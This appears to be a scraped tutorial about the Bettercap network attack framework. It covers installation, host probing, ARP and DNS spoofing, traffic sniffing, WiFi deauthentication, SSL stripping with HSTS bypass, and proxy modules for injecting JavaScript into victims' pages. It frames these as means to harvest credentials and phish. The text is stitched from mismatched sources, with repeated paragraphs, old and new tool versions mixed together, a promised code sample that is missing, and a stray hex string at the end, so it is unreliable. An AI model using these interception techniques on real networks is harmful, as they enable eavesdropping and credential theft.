Bettercap Latest Version

[Rita Seliba]

bettercapsupports GNU/Linux, BSD, Android, Apple macOS and the Microsoft Windows operating systems - depending if you want to install the latest stable release or the bleeding edge from the GitHub repository, you have several choices.

BetterCAP is containerized using Alpine Linux - a security-oriented, lightweight Linux distribution based on musl libc and busybox. The resulting Docker image is relatively small and easy to manage the dependencies. Since it is using a multi-stage build, a Docker version greater than 17.05 is required.

Bettercap, a portable framework written in GO, is often considered a Swiss army knife for its extensive capabilities in performing reconnaissance, attacking WiFi, and scanning Bluetooth low-energy devices and Ethernet networks.

Bettercap allows you to leverage all the features needed to analyze networks and devices and builds upon classic tools like Ettercap to create an advanced modern suite for wired and wireless network attacks.

This enables someone to sit between the traffic of devices to eavesdrop and intercept sensitive communications, modify data in transit, or impersonate devices to gain unauthorized access to systems and services.

If you are installing it on Docker, compiling from source, compiling on Android, or deploying on other Linux distributions (like Ubuntu or Fedora based ones), visit the Installation Page on the official website.

The first step is to use the net.probe command to probe for new hosts on the network. Bettercap does this by sending packets to all IPs in the subnet. We can start the probing by using the net.probe on command.

The module has discovered three devices on the network with IP addresses ending in 133, 134, and 135. At this point, we could leverage additional tools like Nmap to explore and validate these hosts further.

Only connections to and from the external network will be spoofed by default. If you set arp.spoof.internal to true, ARP spoofing will also occur for local communications among devices on the internal network.

Sniffing the traffic also allows us to see all web traffic by the Windows machine. This can give us insight into the user's online activities, expose sensitive information they transmit or request, and potentially harvest login credentials if they visit sites using cleartext HTTP.

DNS spoofing enables us to send users to any domain we want. Sitting between the traffic gives us much power to redirect, monitor, and potentially manipulate the data exchange. This capability can be used for various purposes, such as phishing, credential harvesting, or spreading malware.

Bettercap is also a very fast port scanner. Although less robust than other port scanners like Nmap and RustScan, it allows you to run a SYN scan against any targets you have located during host discovery. It will also attempt to perform banner grabbing against any open ports.

For example, it can send de-authentication or disassociation packets to force devices to reconnect, enabling the capture of the four-way handshake for offline cracking, and it can also create a rogue access point to lure devices into connecting.

To see a list of all discovered access points, use the command wifi.show, which will display a table of found SSIDs with the corresponding BSSID, encryption type, WPS version, the number of connected clients, and data sent and received.

Throughout our tutorial, we walked you through installing Bettercap, discussed its flexibility via built-in modules, and explored techniques like ARP spoofing, traffic sniffing, and DNS spoofing with practical examples.

Are you looking to dive deeper into network recon or penetration testing? Then, join the StationX Community for courses on these topics and take advantage of our many benefits, including mentorship, career guidance, and more.

Bettercap is a powerful MitM attack tool, including ARP and DNS spoofing. It offers functionalities for scanning WiFi networks, executing de-authentication attacks, performing MouseJacking, harvesting credentials, and conducting port scans.

Bettercap is a powerful network sniffer. The net sniff module enables you to sniff network traffic and is used to analyze network traffic passing through the machine it's running on. This module captures and displays packets from the network interface.

Bettercap is more advanced than Ettercap regarding stability, usability, and features. Bettercap addresses many of the limitations found in Ettercap and offers a modern all-in-one solution for network reconnaissance.

Nevertheless we can simplify the concept with an example. When you connect to some network ( your home network, some public WiFi, StarBucks, etc ), the router/switch is responsible for forwarding all of your packets to the correct destination, during a MITM attack we "force" the network to consider our device as the router ( we "spoof" the original router/switch address in some way ):

Once this happens, all of the network traffic goes through your computer instead of the legit router/switch and at that point you can do pretty much everything you want, from just sniffing for specific data ( emails, passwords, cookies, etc of other people on your network ) to actively intercepting and proxying all the requests of some specific protocol in order to modify them on the fly ( you can, for instance, replace all images of all websites being visited by everyone, kill connections, etc ).

Instead of the stable release, you can also clone the source code from the github repository, this will give youall the latest and experimental features, but remember that you're using a potentially unstable release:

The following are the main options that determine the general behaviour of BetterCap, these options are not mandatory, in fact bettercap will automatically detect everything it needs in order to work, you just might need to use one or more of the following options to specify some custom behaviour in specific cases.

BetterCAP will automatically detect your default network interface and use it, if you want to make it use another interface ( when you have more than one, let's say eth0 and wlan0 ) you can use this option.

If no specific target is given on the command line, bettercap will spoof every single address on the network. There are cases when you already know the IP or MAC address of your target(s), in such cases you can use this option.

BetterCap already includes an ARP spoofer ( working both in full duplex and half duplex mode which is the default ), a DNS spoofer and the first, fully working and completely automatized ICMP DoubleDirect spoofer in the world

By default bettercap will only parse packets coming from/to other addresses on the network, if you also want to process packets being sent or received from your own computer you can use this option ( NOTE: will enable the sniffer ).

Bettercap is shipped with a HTTP/HTTPS ( with SSL Stripping and HSTS Bypass ) and raw TCP transparent proxies that you can use to manipulate HTTP/HTTPS or low level TCP traffic at runtime, for instance you could use the HTTP/HTTPS proxy to inject javascripts into the targets visited pages ( BeEF would be a great choice :D ), replace all the images, etc or use the TCP one for other protocols ( downgrade encryption with STARTTLS, dump custom protocols and so forth.

By default the builtin proxies won't do anything but logging all the requests, additionally you can specify a "module" to use and you will be able to load one of the builtin plugins ( or your own ) and manipulate all the traffic as you like.

Bettercap is shipped with both a HTTP and a HTTPS transparent proxies that you can use to manipulate HTTP and HTTPS traffic at runtime ( inject javascripts into the targets visited pages, replace the images, etc ).By default the builtin proxies won't do anything but logging HTTP(S) requests, but if you specify a --proxy-module argument you will be able to load one of the builtin modules ( or your own ) and manipulate HTTP traffic as you like.

You can easily implement a module to inject data into pages or just inspect the requests/responses creating a ruby file and passing it to bettercap with the --proxy-module argument, the following is a sample module that injects some contents into the title tag of each html page, you can find other examples modules in the proxy modules dedicated repository.

Moreover HSTS policies have been prebuilt into major browsers meaning that now, even with a SSL stripping attack running, the browser willconnect to HTTPS anyway, even if the schema is specified, making the attack itself useless.

For this reason, Leonardo Nve Egea presented sslstrip+ ( or sslstrip2 ) during BlackHat Asia 2014.This tool was an improvement over the original Moxie's version, specifically created to bypass HSTS policies.Since HSTS rules most of the time are applied on a per-hostname basis, the trick is to downgrade HTTPS links to HTTP and to prepend some custom sub domain name to them. Every resulting link won't be valid for any DNS server, but since we're MITMing we can resolve these hostnames anyway.

When the "victim" will click on that link, no HSTS rule will be applied ( since there's no rule for such subdomain we just created ) and the MITM software ( BetterCap in our case ^_^ ) will take care of the DNS resolution, allowing us to see and alter the traffic we weren't supposed to see.

If you want to actively modify packets of a TCP protocol which is not HTTP or HTTPS, you'll need the TCP proxy. This event-based proxy will allow you to intercept anything sent/received to/from a specific host using your own custom module.

If you want to actively modify packets of a UDP protocol, you'll need the UDP proxy. This event-based proxy will allow you to intercept anything sent/received to/from a specific host using your own custom module.

If you want to use some custom proxy of yours ( BurpSuite for instance, or some custom app you wrote ) you can still use bettercap to make the whole process easier, no more crappy shell scripts to apply custom firewall rules and launch "esotic" commands!

3a8082e126